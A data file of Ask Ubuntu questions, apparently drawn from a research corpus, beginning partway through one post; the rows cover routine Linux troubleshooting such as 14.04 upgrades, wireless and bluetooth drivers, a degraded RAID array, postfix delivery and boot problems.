description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:05:00.2 logical name : eth0 version : 0a serial : 00:90 : f5 : ef:2b : ef size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-1_0.0.3 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport : d000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff *-network description : wireless interface product : ar9462 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 01 serial : 80:56 : f2 : a5:79:2b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a ip=192.168.178.58 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : f7800000-f787ffff memory : f7880000-f788ffff please tell me if you need anything else . thanks ! ( and sorry for the bad english/bad etiquette , it 's the first time i could n't solve a problem myself and had to bother you . ) update : well , it came back on its own ... if someone has some idea about what happened , that would be nice .
453554	just have background after install	i have just completed upgrade from 13.03 to 14.04 . after logging in just have the background , no menus , no nothing , mouse travels across screen but keyboard does not appear to to work anyone have any ideas please ?
453555	nautilus multihop ssh	i would like to use the nautilus ( or any other usable gui file manager ) to work on virtual machine . this vm is running on a remote server , and i ca n't reach it via ssh from my computer , i have to connect the remote server via ssh , and i can only reach the vm from there with ( local ip ) ssh connection . is it possible to use a gui file manager to view files on remote server from my machine ? is there any way to simplify this connection ? the best related article , what i found did n't helped : transparent multi-hop ssh thanks in advance !
453561	display problem ( multiple screens )	i got a new laptop ( dell latitude e6540 ) with an ati card , everything worked fine , i was able to plug up to 3 displays ( using a workstation ) . but now , i ca n't even change the screen resolution ( 1920 x 1080 by default ) and it ca n't detect other connected screens . i had a look on different topics here and there and googles all sorts of requests , i even uninstalled all drivers and installed xserver-xorg-video-ati back again but the problem remains unsolved .
453564	how to set evolution for pop3 ?	i begin using evolution 3.2.3 with ubuntu 12.04 instead of microsoft outlook 2003 with windows xp . i have set evolution mail account parameters according to the outlook settings . when clicking at 'send/receive ' button above , i only get a message 'error while fetching mail.unable to connect to pop server pop3.seznam.cz : no support for requested authentication mechanism . ' i have tried changing security from ssl to 'no encryption ' , but it has not helped . the 'authentication type ' is 'password ' , the field besides it is not accessible and shows 'check for supported types ' .
453566	unable to install vlc via command line	i am trying to install vlc media player via terminal but its not working.i am using ubuntu 13.10 64 bit.please help . here 's what i did : sudo apt-get install vlc [ sudo ] password for amol : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package vlc amol @ ubuntu : ~ $ amol @ ubuntu : ~ $ sudo apt-get install conky-all reading package lists ... done building dependency tree reading state information ... done e : unable to locate package conky-all amol @ ubuntu : ~ $ i have tried to install conky-all via command line but it shows the same error.conky-all pakage is not available in software center.i really need it.somebody please help .
453567	how to set 'reply-to ' to sender 's address when using forward	i am using postfix with virtual mailboxes ( mysql ) , and i successfully setup a `` mailing list '' by creating a forward that sends copies of a given e-mail to multiple recipients . now , when the e-mail is forwarded to the recipient it provides the mailing list 's address as reply-to address rather than the original sender 's address . is there a way to force postfix to use the sender 's e-mail address for the reply-to header rather than the mailing list 's address ? thanks .
453568	raid5 ca n't start degraded , dropping to shell	already posted about this here : http : //ubuntuforums.org/showthread.php ? t=2219141 but thought i could post here as well , in hopes that it would increase my chances of a solution : ) i 've been running ubuntu server 12.04 in raid5 ( 6 disks ) for a year or so . it 's mainly used for storage and as a plex media server . i still consider myself pretty much a n00b , but using guides i 've managed so far . the server 's been working fine for the most part , except for when one of my hdd 's died a couple months ago . i replaced the disk , added it to the raid and synced it back up - no problem . a few days ago the server stopped responding . i was forced to shut it down with the power button and it would n't come back up . starting in recovery mode it went like this : md : bind < sda1 > md : bind < sdf3 > md : bind < sdd3 > md : bind < sdc1 > md : bind < sda2 > md : bind < sdc3 > md : bind < sdb2 > md : bind < sdf1 > md : bind < sdb3 > md : bind < sde1 > md : kicking non-fresh sdb1 from array ! md : unbind < sdb1 > md : export_rdev ( sdb1 ) bio : create slab < bio-1 > at 1 md/raid : md0 : device sde1 operational as raid disk 4 md/raid : md0 : device sdf1 operational as raid disk 5 md/raid : md0 : device sdc1 operational as raid disk 2 md/raid : md0 : device sda1 operational as raid disk 0 md/raid : md0 : device sdd1 operational as raid disk 3 md/raid : md0 : allocated 6300kb md/raid : md0 : raid level 5 active with 5 out of 6 devices , algorithm 2 md0 : detected capacity change from 0 to 7987527680 md0 : unknown partition table ** warning : there appears to be one or more degraded raid devices ** the system may have suffered a hardware fault , such as a disk drive failure . the root device may depend on the raid devices being online . one or more of the the following raid devices are degraded : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid5 sde1 [ 6 ] sdf1 [ 5 ] sdc1 [ 2 ] sda1 [ 0 ] sdd1 [ 3 ] 7800320 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 6/5 ] [ u_uuuu ] md2 : inactive sdb3 [ 1 ] ( s ) sdc3 [ 2 ] ( s ) sdd3 [ 3 ] ( s ) sdf3 [ 5 ] ( s ) sde3 [ 6 ] ( s ) sda3 [ 0 ] ( s ) 11653109760 blocks super 1.2 md1 : inactive sdb2 [ 1 ] ( s ) sda2 [ 0 ] ( s ) sdd2 [ 3 ] ( s ) sdc2 [ 2 ] ( s ) sdf2 [ 5 ] ( s ) sde2 [ 6 ] ( s ) 58589184 blocks super 1.2 unused devices : < none > you may attempt to start the system anyway , or stop now and attempt manual recovery operations . to do this automatically in the future , add `` bootdegraded=true '' to the kernel boot options . if you choose to start the degraded raid , the system may boot normally , but performance may be degraded , and a further hardware fault could result in permanent data loss . if you abort now , you will be provided with a recovery shell . do you wish to start the degraded raid ? [ y/n ] : y attempting to start the raid in degraded mode ... mdadm : create user root not found mdadm : create group disk not found md : kicking non-fresh sdc3 from array ! md : unbind < sdc3 > md : export_rdev ( sdc3 ) md : kicking non-fresh sdd3 from array ! md : unbind < sdd3 > md : export_rdev ( sdd3 ) md/raid : md2 : device sdb3 operational as raid disk 1 md/raid : md2 : device sdf3 operational as raid disk 5 md/raid : md2 : device sde3 operational as raid disk 4 md/raid : md2 : device sda3 operational as raid disk 0 md/raid : md2 : allocated 6300kb md/raid : md2 : not enough operational devices ( 2/6 failed ) md/raid : md2 : failed to run raid set . md : pers- > run ( ) failed ... mdadm : failed to start aray /dev/md/2 : input/output error md : kicking non-fresh sdd2 from array ! md : unbind < sdd2 > md : export_rdev ( sdd2 ) md : kicking non-fresh sdc2 from array ! md : unbind < sdc2 > md : export_rdev ( sdc2 ) md/raid : md1 : device sdb2 operational as raid disk 1 md/raid : md1 : device sda2 operational as raid disk 0 md/raid : md1 : device sdf2 operational as raid disk 5 md/raid : md1 : device sde2 operational as raid disk 4 md/raid : md1 : allocated 6300kb md/raid : md1 : not enough operational devices ( 2/6 failed ) md/raid : md1 : failed to run raid set . md : pers- > run ( ) failed ... mdadm : failed to start array /dev/md/1 : input/output error mdadm : create user root not found mdadm : create group disk not found /dev/md/0 is already in use . /dev/md/1 is already in use . /dev/md/2 is already in use . could not start the raid in degraded mode . gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; is /dev ) alert ! /dev/disk/by-uuid/ce309028-ce00-4cb5-a6d6-c66ab2480acf does not exist . dropping to a shell ! busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i tried finding a solution by googling the various error messages , but could n't find anything exactly like my own problem . based on my experiences with one drive dying , i noticed md0 was missing drive sdb1 , so i did : mdadm -- manage /dev/md0 -- add /dev/sdb1 i 'm thinking this probably was n't the correct thing to do as when i tried to assemble the raid i got an error message saying something along the lines of md0 containing multiple drives with same id . i ca n't remember exactly , and i 'm scared of doing anything else at this point and thought instead i would seek help . cat /proc/mdstat as it stands : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid5 sdc1 [ 2 ] sda1 [ 0 ] sdf1 [ 5 ] sdb1 [ 7 ] sdd1 [ 3 ] sde1 [ 6 ] 7800320 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 6/6 ] [ uuuuuu ] md2 : inactive sdf3 [ 5 ] sdb3 [ 1 ] sda3 [ 0 ] sde3 [ 6 ] 7768739840 blocks super 1.2 md1 : inactive sdb2 [ 1 ] sda2 [ 0 ] sde2 [ 6 ] sdf2 [ 5 ] 39059456 blocks super 1.2 unused devices : < none > any help would be greatly appreciated : )
453574	external atheros card ( wireless ) is not recognized on 14.04	so i always used an external wifi adapter with my laptop because the intel chipset inside is a little bit unstable . unfortunately , i upgraded to ubuntu 14.04 + gnome and it seems that my ubuntu now recognize my adapter as 'usb wi-fi ' and my intel chipset as 'pci wi-fi ' . now for some reason i ca n't desactivate one of them without disabling both . and every 5-10 mins my connection drops i have to turn off - turn on both adapter anyone has a clue on what 's happenning as i 'm posting this i am downloading the drivers for the atheros chip maybe i 'll get something . thanks
453575	boot loader ( grub ) suddenly does n't show , black screen on boot	i 'm sure there 's many similar questions , but i did n't find an answer anywhere . i 'm on an asus zenbook ux32vd , having windows 7 entirely on a 120gb ssd , and ubuntu on a 24gb internal ssd ( soldered to the motherboard ) i 've been dualbooting ubuntu 13.10 and win7 for a few months flawlessly . a few days ago , i tried to boot ubuntu , but the loading just froze . after i reset my computer , the screen went black after the asus logo shows , and nothing booted at all . i tried going into a ubuntu bootable usb stick , and used boot-repair with recommended settings . now , i still get a black screen for probably 5 minutes after the asus logo , and then it just boots directly into windows . ( this takes unusually long time as well ) . if i go into the boot menu , it still finds both my disks as well . edit : boot-repair log : http : //paste.ubuntu.com/7307363/ any ideas ?
453576	terminal prompt messed up after changing value of ps1	i carelessly entered a command in the terminal that should have been in a shell script : export ps1= $ path : ~/drush23/drush/ now in my terminal instead of this : ubuntu @ ip-10-16-134-18 : /home/ubuntu $ i see this : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/ubuntu/drush23/drush/ and when i change directories this line always stays ... i do n't know what to do i have byobu ...
453577	scan receipts with a gui	i 'm new to ubuntu , and i 'm trying to find an application to scan my receipts in order to create an expense report . is there any software available ? any help is greatly appreciated . thanks
453583	testing postfix in ubuntu	i am using the package sendmailr to send a .csv file through rstudio on an ubuntu build ( 12.04 ) . i get completion messages in rstudio saying that everything went fine , but the message never gets delivered . from r : > sendmail ( from=from , to=to , subject=subject , msg=bodywithattachment ) $ code [ 1 ] `` 221 '' $ msg [ 1 ] `` 2.0.0 bye '' from ubuntu : $ sudo postfix status postfix/postfix-script : the postfix mail system is running : pid : 8576 when i look at the log : $ tail -f /var/log/mail.log apr 22 15:55:12 bre-dev-2 postfix/qmgr [ 11718 ] : b83f424e0140 : from= < bre-dev-2 @ bre-dev-2 > , size=1820 , nrcpt=1 ( queue active ) apr 22 15:55:12 bre-dev-2 postfix/smtpd [ 11953 ] : disconnect from localhost [ 127.0.0.1 ] apr 22 15:55:12 bre-dev-2 postfix/smtp [ 11950 ] : connect to gmail-smtp-in.l.google.com [ 2607 : f8b0:4001 : c05 : :1b ] :25 : network is unreachable apr 22 15:55:12 bre-dev-2 postfix/smtp [ 11950 ] : connect to gmail-smtp-in.l.google.com [ 74.125.193.27 ] :25 : connection refused apr 22 15:55:12 bre-dev-2 postfix/smtp [ 11950 ] : connect to alt1.gmail-smtp-in.l.google.com [ 2607 : f8b0:400d : c04 : :1b ] :25 : network is unreachable apr 22 15:55:12 bre-dev-2 postfix/smtp [ 11950 ] : connect to alt1.gmail-smtp-in.l.google.com [ 74.125.29.27 ] :25 : connection refused apr 22 15:55:12 bre-dev-2 postfix/smtp [ 11950 ] : connect to alt2.gmail-smtp-in.l.google.com [ 74.125.131.27 ] :25 : connection refused apr 22 15:55:12 bre-dev-2 postfix/smtp [ 11950 ] : b83f424e0140 : to= < stuart.greenlee @ gmail.com > , relay=none , delay=0.08 , delays=0.07/0/0.01/0 , dsn=4.4.1 , status=deferred ( connect to alt2.gmail-smtp-in.l.google.com [ 74.125.131.27 ] :25 : connection refused ) and here is the output from postconf -n : lias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix inet_interfaces = all inet_protocols = all mailbox_size_limit = 0 mydestination = myhostname = bre-dev-2 mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 readme_directory = no recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes could someone help me decipher what is going on here ? update here is how the telnet looks : bre-dev-2 @ bre-dev-2 : ~ $ telnet gmail-smtp-in.l.google.com 25 trying 74.125.193.27 ... trying 2607 : f8b0:4001 : c05 : :1a ... telnet : unable to connect to remote host : network is unreachable
453587	broadcom wifi issue on 14.04 lubuntu	i have a brand new 14.04 lts lubuntu install on a dell inspiron 8600 which is getting wired internet connection , but not wifi . i 've attempted some of the previous resolves for this , but seem now to have created a larger problem . at boot up , i get a system error message the detail of which reads kerneloops , kernelbug at include/net/cfg80211.h:3150 ! . i had previously tried to follow the instructions to deal with the legacy wifi issue here : - https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx specifically the section dealing with installing b43/b43 legacy firmware , but ran up against error messages trying to with the 'sudo apt-get update ' command , which ended in the error 'e : dpkg was interrupted , you must manually run `` sudo dpkg -- configure -a '' ' . when i do this , it appears to run a process relating to the broadcom card , and appears to complete , but ends in `` segmentation fault '' . earlier in the process , i also had experience of the apt command meeting what appears to be an open lock issue , hence i explored this thread , unable to lock the administration directory ( /var/lib/dpkg/ ) is another process using it ? , though i can not tell if i resolved this issue , given the repeated segmentation fault in response to the `` sudo dpkg -- configure -a '' command . with regard to the broadcom driver , software and updates seemed to have installed the broadcom sta driver and had it in use according to the additional driver info , but wifi was not working , nonetheless . thanks
453590	running installed windows programs	how to run windows programs ( which are already installed in windows ) on ubunt 12.04 ; i have installed ubuntu through wubi installer and both windows and ubuntu exist .
453596	how to upgrade from ubuntu 12.10 to 14.04	i was under the impression that upgrading to ubuntu 14.04 was supported from all version between and including the previous lts release ( 12.04 ) . why is it then , that update-manager ( with and without -d option ) will only offer to upgrade to version 13.10 from my ubuntu 12.10 system ? even that only works when i change the updater settings from `` for long-term support versions '' to `` for any new version . '' is it only possible to upgrade to 14.04 via 13.10 ?
453597	my lock screen in ubuntu 14.04 turns ugly after install jayatana	i 've already installed the latest ubuntu ( 14.04 ) , one thing that i notice is the new lock screen , but somehow , my lock screen turns into ugly , like in the previous ubuntu version ( 13.10 and below ) . is there any way i could do to return to the new lock screen ? i 've recently installed jayatana , due to the hidden global menu in eclipse . the global menu was back , but the lock screen is ugly , are they really related ?
453599	hmdi sound output not detected if vga monitor connected at boot	the option to output my sound through hdmi tv ( as seen below ) does not appear if i boot my machine ( an asus laptop running ubuntu 14.04 with open-source drivers ) while my vga monitor is connected as well . i can obtain my desired set-up if i : - first , disconnect the monitor ; wait till the laptop is done booting up ; switch the sound output to hdmi ; connect my monitor ; and finally , enable the monitor and tv leaving the laptop 's internal screen disabled in display settings ; but , as you can imagine , that is inconvenient . i 'm looking for something more like : boot up ; ? ? ? profit ! how can i retain the option to output sound through hdmi on boot while leaving my vga monitor connected at all times ? update : why is this question getting no love ? bumped .
453600	eth0 not working on fresh install of 12.04	i 've just reinstalled my ubuntu 12.04 server with a clean install and i can not get the networking to work , so i am unable to update the machine . can anbody give me some advice on what solution i can try . here is some info for you to work with . $ ip link 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 cdisc pfifo_fast state up qlen 1000 link/ether 00:0b:6a : dd : a6 : f8 brd : ff : ff : ff : ff : ff : ff $ sudo nano /etc/network/interfaces auto lo iface lo inet loopback auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 192.168.0.223 netmask 255.255.255.0 gateway 192.168.0.226 dns-nameservers 192.168.0.228 192.168.5.253 $ status networking networking stop/waiting $ sudo service networking start networking stop/waiting $ sudo ifdown eth0 $ sudo ifup -v eth0 configuring interface eth0=eth0 ( inet ) run-parts -- verbose /etc/network/if-pre-up.d run-parts : execute /etc/network/if-pre-up.d/wireless-tools run-parts : execute /etc/network/if-pre-up.d/wpasupplicant ip addr add 192.168.0.223/255.255.25.0 broadcast + dev eth0 label eth0 ip link set dev eth0 up ip route add default via 192.168.0.226 metric 100 dev eth0 run-parts -- verbrose /etc/netwrok/if-up.d run-parts : executing /etc/netwrok/if-up.d/000resolvconf run-parts : executing /etc/netwrok/if-up.d/ntdate run-parts : executing /etc/netwrok/if-up.d/openssh-server ssh stop/waiting ssh start/running , process 2111 run-parts : executing /etc/network/if-up.d/upstart run-parts : executing /etc/network/if-up.d/wpasupplicant the ip details are all correct . i know the network is up and running as i have used a windows computer to ping the ip address with no luck and i have tested the cables using a mac pro and they are active . also just noticed when i plug the ethernet cable in the light doesnt appear on the switch if you do need anymore info let me know thanks edit : added ifup -v eth0 details
453603	locale settings not working after upgrading to 14.04	after upgrading to ubuntu 14.04 norwegian letters are missing from the keyboard , there is no norwegian keyboard to select using text entry settings ( only for dvorak , mac etc ) , and when i add a new user , i can not select norwegian as his language - it automatically slides back to english - in other words something has gone terribly wrong with locale settings . this is the output from the command locale : locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=nb_no.utf-8 language=nb_no : fil : en_gb : en lc_ctype= '' nb_no.utf-8 '' lc_numeric=nb_no.utf-8 lc_time=nb_no.utf-8 lc_collate= '' nb_no.utf-8 '' lc_monetary=nb_no.utf-8 lc_messages= '' nb_no.utf-8 '' lc_paper=nb_no.utf-8 lc_name=nb_no.utf-8 lc_address=nb_no.utf-8 lc_telephone=nb_no.utf-8 lc_measurement=nb_no.utf-8 lc_identification=nb_no.utf-8 lc_all=
453605	ralink rt 3290 bluetooth problem on ubuntu 14.04	i recently installed ubuntu 14.04 and everything is working good except the bluetooth . i have ralink 3290 bluetooth . tried to install the driver using the method described here . the code is not compiling and giving 2 errors . even the change in os/linux/pci_main_dev.c is not working . update : now i followed this link and after modifying some file a little bit , i was successful in compiling and installing this driver . i am certain that ubuntu finally found a bluetooth adapter , and now i am getting bluetooth in : rfkill list all 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 1 : hci0 : bluetooth soft blocked : yes hard blocked : no but now the bluetooth is disabled error is showing and the output of dmesg | grep blue [ 17.378741 ] bluetooth : core ver 2.17 [ 17.378778 ] bluetooth : hci device and connection manager initialized [ 17.378788 ] bluetooth : hci socket layer initialized [ 17.378792 ] bluetooth : l2cap socket layer initialized [ 17.378799 ] bluetooth : sco socket layer initialized [ 17.809313 ] bluetooth : hci0 sending frame failed [ 20.507392 ] bluetooth : rfcomm tty layer initialized [ 20.507420 ] bluetooth : rfcomm socket layer initialized [ 20.507440 ] bluetooth : rfcomm ver 1.11 [ 20.669232 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 20.669237 ] bluetooth : bnep filters : protocol multicast [ 20.669249 ] bluetooth : bnep socket layer initialized is coming .
453607	ca n't set alias in zsh -- - command not found ?	i 'm trying to set alias conky-lua = '' conky -c ./.conky/conkyrc & '' so to start conky-lua . but when i source .zshrc it says command not found . a possible solution that i found on stackoverflow is to set alias ls='ls -gpf'did n't solve the problem
453608	change the partitioning scheme of a storage device	is there any tool that will change the partitioning scheme of a storage device like for example from mbr to gpt or any other scheme ?
453609	how to connect two computers using wifi network and without using router ?	i have an embedded board which has an ethernet port . this port is connected to a fpga ( an electronic device ! ) which sends data to this port at 1 gbit/sec . i want to monitor this board to see if it works or not and i must see its screen for some reason . since this port is solely dedicated to the fpga i can not use a switch in here to share it ( its capacity is already being filled with fpga and there 's no any bandwidth for me to connect to this board ) , so i used a tplink tl-wn7200nd wireless usb and attached it to my usb port so i could connect to this board through this device . i was able to see my desktop using vnc viewer by connecting my laptop as wired connection to the ethernet port . but for the wireless device i do n't know how to do it . i tried to make my embedded board as a hot spot and create an adhoc connection using this link but it did n't worked for me and i was n't able to detect my adhoc network in my laptop ! ! ! i tried to give static ip address to my usb wireless in the embedded system so i could connect to it through static ip . but it did n't work either . i 've read this link for it . i also read this link which tries to connect two pc without a router , but it is for wired connection and does not apply to my situation . so i do n't know what to do and how to see my embedded board desktop . i 'd appreciate any help to solve this problem . p.s both my laptop and embedded board run ubuntu 13.10 ( i 've installed this os exactly the same on both machines ) . if i use a router in here i could connect to this board through this usb wifi module but i do n't want to use one . ( it costs ! ! ! ) thanks
453613	./configure error xft.pc is missing	i try to install something and did as asked in the readme ./configure but it gives me the following error : checking for xft ... package xft was not found in the pkg-config search path . perhaps you should add the directory containing `xft.pc ' to the pkg_config_path environment variable no package 'xft ' found configure : error : library requirements ( xft ) not met ; consider adjusting the pkg_config_path environment variable if your libraries are in a nonstandard prefix i 'm not really familiar with linux so i googled a bit and came across the command `` locate xft.pc '' but it doesnt give me any output so i assume i 'm missing the xft.pc . i tried `` sudo apt-get xft.pc '' but that didnt helped either . any ideas ?
453616	software to use webcam as camera	is there software that allows the webcam to be used as a camera ? i 'm using ubuntu 12.04 desktop . thanks !
453621	ubuntu 14 + psion neo device	this is what my /var/log/syslog tells me when connecting a psion neo device using usb : ( actually i 'm connecting the psion neo cradle px3001 holding the device ) apr 23 14:46:01 envy kernel : [ 1693.876175 ] usb 3-4 : new full-speed usb device number 14 using xhci_hcd apr 23 14:46:02 envy kernel : [ 1694.769854 ] usb 3-4 : new usb device found , idvendor=045e , idproduct=00ce apr 23 14:46:02 envy kernel : [ 1694.769864 ] usb 3-4 : new usb device strings : mfr=1 , product=2 , serialnumber=0 apr 23 14:46:02 envy kernel : [ 1694.769869 ] usb 3-4 : product : psion teklogix px750 serial device apr 23 14:46:02 envy kernel : [ 1694.769873 ] usb 3-4 : manufacturer : psion teklogix apr 23 14:46:02 envy kernel : [ 1694.770581 ] ipaq 3-4:1.0 : pocketpc pda converter detected apr 23 14:46:02 envy kernel : [ 1694.770870 ] usb 3-4 : pocketpc pda converter now attached to ttyusb0 apr 23 14:46:02 envy mtp-probe : checking bus 3 , device 14 : `` /sys/devices/pci0000:00/0000:00:14.0/usb3/3-4 '' apr 23 14:46:02 envy mtp-probe : bus : 3 , device : 14 was not an mtp device apr 23 14:46:02 envy modemmanager [ 863 ] : < warn > ( ttyusb0 ) : port attributes not fully set apr 23 14:46:20 envy modemmanager [ 863 ] : < info > creating modem with plugin 'generic ' and '1 ' ports apr 23 14:46:20 envy modemmanager [ 863 ] : < warn > could not grab port ( tty/ttyusb0 ) : ' can not add port 'tty/ttyusb0 ' , unhandled serial type' apr 23 14:46:20 envy modemmanager [ 863 ] : < warn > could n't create modem for device at '/sys/devices/pci0000:00/0000:00:14.0/usb3/3-4 ' : failed to find primary at port apr 23 14:47:12 envy avahi-daemon [ 716 ] : invalid response packet from host 10.10.10.28 . i had this device mounted 1 time , after that never again ... ca n't seem to find any information about ubuntu/linux + this device . if you need more information , please shout ! btw : i 'll be needing this device through virtualbox > windows 7 > visual studio .net 2008 thank you
453623	how to install ubuntu 13.10 inside c drive of windows 8.1	i have done this before in my dell machine.there was an option to install ubuntu inside c drive in win 8.1 ( it consumes 18 gb of drive space of windows c drive.no need to create different partion to install ubuntu ) when i tried the same installation method in my friend 's hp laptop there was no option like install ubuntu inside windows.please tell me how to install ubuntu inside windows 8.1 ( in hp pavalion ) thank you .
453625	64-bit mac ( amd 64 ) download	i was going to download ubuntu from its official site . i found an option called 64-bit mac ( amd 64 ) . can anybody tell me what this option means ? is it an os version especially made for those who have amd processor ?
453627	ubuntu server 12.04 - webmin & openvpn have both stopped accepting connections	i work for a small company that has an off-site windows 2012 server which hosts two other virtual servers via virtualbox ; one of these is an ubuntu 12.04 server which runs openvpn . the set-up was configured before i joined the company , and the previous tech guy has since left . i got news this morning that users can not connect to our vpn . i confirmed from my own pc that connection to the vpn was being refused ( auth_failed - it is configured to authenticate against active directory on the win2012 server and i triple-checked my credentials are correct ) . i suspected the failure may have been due to the recent heartbleed bug and that any updated openvpn clients might require the host be updated too , so i logged into the ubuntu server and issued `` sudo apt-get update '' and `` sudo apt-get upgrade '' - openvpn was one of the packages to get updated . i issued a `` sudo reboot '' on the ubuntu server and tried to connect via openvpn again but it still fails ( auth_failed ) . i then suspected that because the server and clients had been updated that i might need to issue everyone new certificates ( though i hope this wo n't be necessary ! ) , so i tried to administer openvpn users & certificates via webmin ... however , opening the webmin web-interface also failed ( connection timed out on `` https : // ( ubuntu-server-ip ) :10000 '' ) . i have issued a `` sudo service webmin restart '' and it reports `` stopping webmin server in /usr/share/webmin '' , `` starting webmin server in /usr/share/webmin '' , `` pre-loaded webmincore '' ; but further attempts to connect from the the win2012 host pc still time out ( i have also temporarily disabled the firewall and tried different browsers , but the results are the same ) both of these services were working fine when i last tried a few weeks ago , and no-one has made any manual changes to the server settings in the intervening time . any ideas what might have caused these issues , and what i can do to fix them ?
453628	unable to run python file from terminal	i am not able to run this pyhton file from terminal . i have added the shebang # ! /usr/bin/env python at start of the file . am i doing something wrong ? how can i run this file from terminal ? edit : https : //imgur.com/yybpilr i guess , this might be helpful .
453629	require all iso images for ubuntu lts 14.04	i do not want to use internet to make online packages installation , instead i want to install the complete installation on multiple machines from local dvds ... where can i get the entire packages ? thx
453631	problem with upgrade from 12.04 to 14.04	upgrading from 12.04 to 14.04 last night and everthing was chugging along nicely until i tried to open a browser . the screen went to black for a few seconds and then came back to the user login screen ( as if i was changing users ) . there is only one user account on this machine , so i entered my password and up came the ubuntu 14.04 screen at a lower resolution . the hard drive light continued to blink , so i was hopeful that the upgrade would continue even though i could no longer see the desktop with update screen , but it stopped after about 30 seconds . i can move the cursor around but get no response from keyboard entries . so what should i do now ? is there a chance that i could log back in to the original desktop and continue the installation ? as i remember , it was maybe a third of the way through the upgrade according to the bar at the bottom of the upgrade window ( it had just asked me if it could replace settings for `` fuse '' ) . or should i restart the computer and hope for the best ? any guidance would be truly appreciated !
453640	is there an option to tell ubuntu to install all dev packages ?	i have more than enough disk space and i am constantly annoyed by code i am compiling saying `` you do n't have foo '' and then having to figure out which package foo is in , install that package and retry to find out `` you do n't have bar '' . i just want all dev packages for every package i have installed . and if i install a new package , the dev packages should be installed as well .
453641	upgrading to ubuntu 14.04 from ubuntu 13.10	how to upgrade ubuntu 13.10 to ubuntu 14.04 ? it gives an error that `` third party sources are disabled could n't get software list ''
453650	conversion to pdf failed	i 'm trying to convert a ms-word .doc file to a pdf using abiword . we are running several servers with precise installed . but on my local machine i 'm running saucy . on the servers with abiword 2.9.2+svn20120213-1 it works without problems . on my machine with abiword 3.0.0~svn20130523-1ubuntu2 the following happens : $ abiword -- verbose=2 -t pdf -o test.pdf test.doc abgebrochen ( german version ) also with maximum verbosity it does not output any useful . neither to stdout/stderr nor to syslog .
453651	problems in upgrading 12.04 to 14.04 which is 64bit wubi application ?	i 'm on 12.04 currently i want to upgrade to trusty . i 'm using wubi 64bit application and people said that there might be problems for 64 bit regarding grub menu . is there a chance that i might lose windows ( i 'm using 8.1 pro ) ?
453655	ubuntu 14.04 bluetooth magic mouse does n't pair ( no agent available )	mouse gets discovered . although , it does n't pair . /var/log/syslog : apr 23 10:05:15 xavier bluetoothd [ 9873 ] : no agent available for request type 0 apr 23 10:05:15 xavier bluetoothd [ 9873 ] : btd_event_request_pin : operation not permitted apr 23 10:05:15 xavier bluetoothd [ 9873 ] : connection refused ( 111 ) it 's worth saying that : keyboard has paired and it 's working just fine though ; mouse used to work just fine in ubuntu 12.04 , and 13 , and it works when i reboot on mac ; this is the hci device . $ hcitool dev devices : hci0 e0 : f8:47:3a:3f:47 how to get it working ?
453658	samba 3.x for ubuntu 14.04	is there a samba 3 package for ubuntu 14.04 ? thus far i have not come across any such thing , so i suppose the better question is should i just compile samba 3 from source ? thanks !
